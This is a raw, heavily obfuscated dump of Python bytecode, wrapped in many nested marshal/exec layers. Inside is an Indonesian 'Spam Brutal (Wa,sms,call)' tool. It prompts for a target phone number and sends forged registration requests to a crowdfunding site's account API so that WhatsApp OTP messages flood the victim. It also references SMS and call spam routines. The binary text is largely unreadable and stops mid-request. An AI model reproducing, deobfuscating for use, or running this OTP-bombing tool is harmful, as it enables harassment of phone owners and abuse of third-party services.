00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xeb9\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01
S\x00)\x03\xe9\x00\x00\x00\x00Ns`9\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xd58\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00NsJ8\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xbf7\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns47\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xa96\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x1e6\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x935\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x085\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\
x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns}4\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xf23\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Nsg3\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xdc2\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00NsQ2\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xc61\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns;1\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xb00\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns%0\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x9a/\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x0f/\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x84.\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xf9-\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Nsn-\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xe3,\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00NsX,\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xcd+\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x
00\x00NsB+\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xb7*\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns,*\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xa1)\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x16)\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x8b(\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x00(\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Nsu\'\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xea&\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01
e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns_&\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xd4%\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00NsI%\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xbe$\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns3$\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xa8#\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00h\x00\x00\x00@\x00\x00\x00sj\x02\x00\x00d\x00d\x01l\x00Z\x00d\x00d\x01l\x01Z\x01d\x00d\x01l\x02Z\x02d\x00d\x01l\x03Z\x03d\x00d\x01l\x04Z\x04d\x00d\x01l\x05Z\x05d\x00d\x02l\x06m\x07Z\x07\x01\x00d\x03Z\x08d\x04Z\td\x05Z\nd\x06Z\x0bd\x07Z\x0cd\x08Z\re\x0ed\te\x08\x9b\x00d\ne\r\x9b\x00d\x0be\x08\x9b\x00d\x0ce\t\x9b\x00\x9d\x08\x83\x01Z\x0fe\x07d\r\x83\x01\x01\x00e\x02\xa0\x10d\x0e\xa1\x01\x01\x00d\x0fe\x0c\x9b\x00d\x10e\r\x9b\x00d\x11e\x0c\x9b\x00d\x12e\r\x9b\x00d\x13e\n\x9b\x00d\x14e\x08\x9b\x00d\x15e\r\x9b\x00d\x16e\x0b\x9b\x00d\x17e\x08\x9b\x00d\x15e\r\x9b\x00d\x18e\x0b\x9b\x00d\x19e\x08\x9b\x00d\x15e\r\x9b\x00d\x1ae\x0b\x9b\x00d\x1be\x08\x9b\x00d\x15e\r\x9b\x00d\x1ce\x0b\x9b\x00d\x1de\
n\x9b\x00d\x14e\x08\x9b\x00d\x15e\r\x9b\x00d\x1ee\x0b\x9b\x00d\x1fe\x08\x9b\x00d\x15e\r\x9b\x00d e\x0b\x9b\x00d!e\x08\x9b\x00d\x15e\r\x9b\x00d"e\x0b\x9b\x00d#e\n\x9b\x00d$e\x08\x9b\x00d%e\x08\x9b\x00d&e\r\x9b\x00d\'e\x08\x9b\x00d&e\r\x9b\x00d(e\x08\x9b\x00d&e\r\x9b\x00d)e\n\x9b\x00d*e\x08\x9b\x00d+e\r\x9b\x00d,e\t\x9b\x00e\x0f\x9b\x00d-e\n\x9b\x00d.e\x08\x9b\x00d/e\x08\x9b\x00d0e\n\x9b\x00d1e\x08\x9b\x00d/e\r\x9b\x00d2e\n\x9b\x00d3e\x08\x9b\x00d/e\r\x9b\x00d4e\n\x9b\x00d5e\x08\x9b\x00d/e\r\x9b\x00d6\x9dhZ\x11G\x00d7d8\x84\x00d8\x83\x02Z\x12e\x13\x83\x00\x01\x00e\x07d\r\x83\x01\x01\x00G\x00d9d:\x84\x00d:\x83\x02Z\x14G\x00d;d<\x84\x00d<\x83\x02Z\x15e\x16d=k\x02\x90\x02rfz\ne\x12\x83\x00\x01\x00W\x00nV\x04\x00e\x17\x90\x02y8\x01\x00\x01\x00\x01\x00e\x18d>e\x08\x9b\x00d?e\r\x9b\x00d@\x9d\x05\x83\x01\x01\x00Y\x00n.\x04\x00e\x04j\x19j\x1a\x90\x02yd\x01\x00\x01\x00\x01\x00e\x18d>e\x08\x9b\x00d?e\r\x9b\x00dA\x9d\x05\x83\x01\x01\x00Y\x00n\x020\x00d\x01S\x00)B\xe9\x00\x00\x00\x00N)\x01\xda\x05sleepz\x07\x1b[1;31mz\x07\x1b[1;32mz\x07\x1b[1;33mz\x07\x1b[1;36mz\x07\x1b[1;35mz\x07\x1b[1;37mz\x02\n u\x05\x00\x00\x00\xe2\x80\xa2> z\x14What is Your Name ? 
\xfa\x02: \xe9\x01\x00\x00\x00\xda\x05clearz\x0f \n u7\x00\x00\x00\xe2\x96\x88\xe2\x96\x80\xe2\x80\x83\xe2\x96\x88\xe2\x96\x80\xe2\x96\x88\xe2\x80\x83\xe2\x96\x84\xe2\x96\x80\xe2\x96\x88\xe2\x80\x83\xe2\x96\x88\xe2\x96\x80\xe2\x96\x84\xe2\x96\x80\xe2\x96\x88\xe2\x80\x83 \xe2\x80\x83uJ\x00\x00\x00\xe2\x96\x88\xe2\x96\x84\xe2\x96\x84\xe2\x80\x83\xe2\x96\x88\xe2\x96\x80\xe2\x96\x88\xe2\x80\x83\xe2\x96\x88\xe2\x96\x91\xe2\x96\x88\xe2\x80\x83\xe2\x96\x80\xe2\x96\x88\xe2\x96\x80\xe2\x80\x83\xe2\x96\x84\xe2\x96\x80\xe2\x96\x88\xe2\x80\x83\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\n u7\x00\x00\x00\xe2\x96\x84\xe2\x96\x88\xe2\x80\x83\xe2\x96\x88\xe2\x96\x80\xe2\x96\x80\xe2\x80\x83\xe2\x96\x88\xe2\x96\x80\xe2\x96\x88\xe2\x80\x83\xe2\x96\x88\xe2\x96\x91\xe2\x96\x80\xe2\x96\x91\xe2\x96\x88\xe2\x80\x83 \xe2\x80\x83uJ\x00\x00\x00\xe2\x96\x88\xe2\x96\x84\xe2\x96\x88\xe2\x80\x83\xe2\x96\x88\xe2\x96\x80\xe2\x96\x84\xe2\x80\x83\xe2\x96\x88\xe2\x96\x84\xe2\x96\x88\xe2\x80\x83\xe2\x96\x91\xe2\x96\x88\xe2\x96\x91\xe2\x80\x83\xe2\x96\x88\xe2\x96\x80\xe2\x96\x88\xe2\x80\x83\xe2\x96\x88\xe2\x96\x84\xe2\x96\x84\n z0==========================================\n u\x06\x00\x00\x00[\xe2\x80\xa2] z\nMessage : u\x1d\x00\x00\x00Welcome Tukang Jail\xf0\x9f\x98\x85\n z\nServer : z\x15Online \n z\nScript : z!Spam Brutal (Wa,sms,call) \n z\nVersi : z\x142.0 \n z\nAuthor : z\x15Hendar \n z\nYoutube : z\x13H20 Studio \n z\nGroup : z\x14bit.ly/3ddfT2F0\n z3========================================== \n z\x12Warning..!!\n z\x02- z\x1bGunakan dengan bijak\n z\x1eBisa merusak pertemanan\n z\x1eBisa di tampol sama orang\n z1========================================== \n \xfa\x04[>] z\nName : z\x08\n\n \xda\x011z\x02. 
z\x14Starting Spam\n \xda\x012u\x1d\x00\x00\x00Follow Sosmed Aink\xf0\x9f\x98\x81\n \xda\x013u\x1b\x00\x00\x00Donasi Buat Kopi\xf0\x9f\x98\x8e\n \xda\x014z\x05Exit\nc\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s\x1c\x00\x00\x00e\x00Z\x01d\x00Z\x02d\x01d\x02\x84\x00Z\x03d\x03d\x04\x84\x00Z\x04d\x05S\x00)\x06\xda\x04Mainc\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\x12\x00\x00\x00d\x01|\x00_\x00|\x00\xa0\x01\xa1\x00\x01\x00d\x00S\x00)\x02Nz\x0fHendar Official)\x02\xda\x04sanz\xda\x04main\xa9\x01\xda\x04self\xa9\x00r\x10\x00\x00\x00\xfa\x0b<H20studio>\xda\x08__init__,\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x06\x01z\rMain.__init__c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\n\x00\x00\x00C\x00\x00\x00s\x00\x02\x00\x00t\x00t\x01\x83\x01\x01\x00t\x02d\x01t\x03\x9b\x00d\x02t\x04\x9b\x00\x9d\x04\x83\x01}\x01t\x05d\x03\x83\x01\x01\x00t\x06\xa0\x07d\x04\xa1\x01\x01\x00|\x01d\x05k\x02s@|\x01d\x06k\x02\x90\x01r\x02t\x00d\x07t\x03\x9b\x00d\x08t\x08\x9b\x00d\tt\x03\x9b\x00d\nt\x04\x9b\x00d\x0b\x9d\t\x83\x01\x01\x00t\x05d\x03\x83\x01\x01\x00t\x02d\x01t\x03\x9b\x00d\x08t\x08\x9b\x00d\x0ct\x03\x9b\x00d\nt\x08\x9b\x00\x9d\x08\x83\x01\xa0\td\rd\x0e\xa1\x02a\nt\x05d\x0f\x83\x01\x01\x00t\x00\x83\x00\x01\x00t\x05d\x10\x83\x01\x01\x00t\nd\x0ek\x02r\xb2nNt\x0b\x83\x00\x01\x00t\x0c\x83\x00\x01\x00t\r\x83\x00\x01\x00t\x00d\x11t\x04\x9b\x00d\x12\x9d\x03\x83\x01\x01\x00|\x00\xa0\x0ed\x13\xa1\x01\x01\x00t\x0fj\x10\xa0\x11d\x14\xa1\x01\x01\x00t\x0fj\x10\xa0\x11d\x15\xa1\x01\x01\x00t\x05d\x10\x83\x01\x01\x00q\xb2n\xfa|\x01d\x16k\x02\x90\x01s\x16|\x01d\x17k\x02\x90\x01r^t\x00d\x07t\x03\x9b\x00d\x18t\x08\x9b\x00d\x19\x9d\x05\x83\x01\x01\x00t\x06\xa0\x07d\x1a\xa1\x01\x01\x00t\x02d\x01t\x03\x9b\x00d\x1bt\x08\x9b\x00d\x1c\x9d\x05\x83\x01\x01\x00t\x00\x83\x00\x01\x00t\x06\xa0\x07d\x1d\xa1\x01\x01\x00n\x9e|\x01d\x1ek\x02\x90\x01sr|\x01d\x1fk\x02\x90\x01r\xbat\x00d\x07t\x03\x9b\x00d\x18t\x
08\x9b\x00d \x9d\x05\x83\x01\x01\x00t\x06\xa0\x07d!\xa1\x01\x01\x00t\x02d\x01t\x03\x9b\x00d\x1bt\x08\x9b\x00d\x1c\x9d\x05\x83\x01\x01\x00t\x00\x83\x00\x01\x00t\x06\xa0\x07d\x1d\xa1\x01\x01\x00nB|\x01d"k\x02\x90\x01s\xce|\x01d#k\x02\x90\x01r\xe6t\x12d\x07t\x03\x9b\x00d\x18t\x08\x9b\x00d$\x9d\x05\x83\x01\x01\x00n\x16t\x12d\x07t\x03\x9b\x00d\x18t\x08\x9b\x00d%\x9d\x05\x83\x01\x01\x00d\x00S\x00)&Nz\x05 z\x0e[>] Input no: g\x00\x00\x00\x00\x00\x00\xe0?z2xdg-open https://www.youtube.com/c/HendarOfficial1r\x07\x00\x00\x00Z\x0201\xfa\x06\n r\x06\x00\x00\x00z\x08Example r\x03\x00\x00\x00z\x0e+6281234567xxxz\x08Number z\x03+62\xda\x00g\xcd\xcc\xcc\xcc\xcc\xcc\x00@r\x04\x00\x00\x00\xfa\x04 z*==========================================\xe9\n\x00\x00\x00z\x1c\r \xfa\x01\rr\x08\x00\x00\x00Z\x0202\xfa\x02! z\x1aFollow Instagram Aink Ngabz2xdg-open https://www.instagram.com/hendar_scripterz\x02> z\x17Press Enter to go Back z\x0epython spam.pyr\t\x00\x00\x00Z\x0203z\nNgopi ngabz%xdg-open https://saweria.co/H20Studior\n\x00\x00\x00Z\x0204z\x12Exit This Tools..\nz\x16Option Does Not 
Exist\n)\x13\xda\x05print\xda\x06banner\xda\x05input\xda\x03red\xda\x06yellowr\x02\x00\x00\x00\xda\x02os\xda\x06system\xda\x05white\xda\x07replace\xda\x05nomorZ\x07sxp_sms\xda\x06sxp_wa\xda\x08sxp_call\xda\x04wait\xda\x03sys\xda\x06stdout\xda\x05write\xda\x04exit)\x02r\x0f\x00\x00\x00r\x0c\x00\x00\x00r\x10\x00\x00\x00r\x10\x00\x00\x00r\x11\x00\x00\x00r\r\x00\x00\x000\x00\x00\x00sF\x00\x00\x00\x00\x02\x08\x01\x14\x01\x08\x01\n\x01\x12\x01"\x01\x08\x01(\x01\x08\x01\x06\x01\x08\x01\x08\x01\x02\x03\x06\x01\x06\x01\x06\x01\x10\x01\n\x01\x18\x01\x0c\x02\x14\x01\x16\x02\n\x01\x16\x01\x06\x01\x0c\x01\x14\x01\x16\x02\n\x01\x16\x01\x06\x01\x0c\x01\x14\x01\x18\x02z\tMain.mainN)\x05\xda\x08__name__\xda\n__module__\xda\x0c__qualname__r\x12\x00\x00\x00r\r\x00\x00\x00r\x10\x00\x00\x00r\x10\x00\x00\x00r\x10\x00\x00\x00r\x11\x00\x00\x00r\x0b\x00\x00\x00+\x00\x00\x00s\x04\x00\x00\x00\x08\x01\x08\x04r\x0b\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00sL\x00\x00\x00e\x00Z\x01d\x00Z\x02d\x01d\x02\x84\x00Z\x03d\x03d\x04\x84\x00Z\x04d\x05d\x06\x84\x00Z\x05d\x07d\x08\x84\x00Z\x06d\td\n\x84\x00Z\x07d\x0bd\x0c\x84\x00Z\x08d\rd\x0e\x84\x00Z\td\x0fd\x10\x84\x00Z\nd\x11S\x00)\x12r#\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\x1c\x00\x00\x00d\x01|\x00_\x00t\x01\xa0\x02\xa1\x00|\x00_\x03|\x00\xa0\x04\xa1\x00\x01\x00d\x00S\x00\xa9\x02Nz\rFREE 
TUTORIAL\xa9\x05r\x0c\x00\x00\x00\xda\x08requestsZ\x07Session\xda\x03reqr\r\x00\x00\x00r\x0e\x00\x00\x00r\x10\x00\x00\x00r\x10\x00\x00\x00r\x11\x00\x00\x00r\x12\x00\x00\x00a\x00\x00\x00s\x06\x00\x00\x00\x00\x01\x06\x01\n\x01z\x0fsxp_wa.__init__c\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x11\x00\x00\x00C\x00\x00\x00sf\x00\x00\x00t\x00\xa0\x01g\x00d\x01\xa2\x01\xa1\x01}\x02t\x00\xa0\x02d\x02d\x03\xa1\x02}\x03|\x00j\x03j\x04d\x04d\x05d\x06d\x07d\x08t\x05d\td\nd\x0bd\x0cd\td\rd\x0ed\x0fd\x10d\x11\x9c\x0e|\x02t\x06|\x03\x83\x01\x17\x00d\x12|\x01\x9b\x00\x9d\x02d\x13d\x14\x9c\x03d\x15\x8d\x03j\x07}\x04d\x00S\x00)\x16N)\x04Z\x05fahmiZ\x07xzc0derZ\x07bed3bahZ\x05xmanz\xe9o\x00\x00\x00i\xe7\x03\x00\x00z(https://wong.kitabisa.com/register/draftz\x11wong.kitabisa.comZ\x03pwaz\x1chttps://account.kitabisa.comZ\n1611020248z\x051.0.0\xfa\x10application/jsonZ\x06kanvasz$107790c3-86e0-4872-9dfb-b9c5da9bfa13Z@e6b4dd627125b3ccd53de193d165c481cc7fdfef0b1dcd7a587636a008fdc89e\xfa\x053.4.0z2https://account.kitabisa.com/register/otp?type=sms\xfa#id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7)\x0e\xda\x04Hostz\x14x-ktbs-platform-name\xda\x06originz\x0bx-ktbs-time\xfa\nuser-agentz\x12x-ktbs-api-versionZ\x06acceptz\x12x-ktbs-client-namez\x11x-ktbs-request-idz\x15x-ktbs-client-versionz\x10x-ktbs-signature\xda\x07versionZ\x07refererz\x0faccept-language\xda\x010Z\x08whatsapp)\x03Z\tfull_nameZ\x08username\xd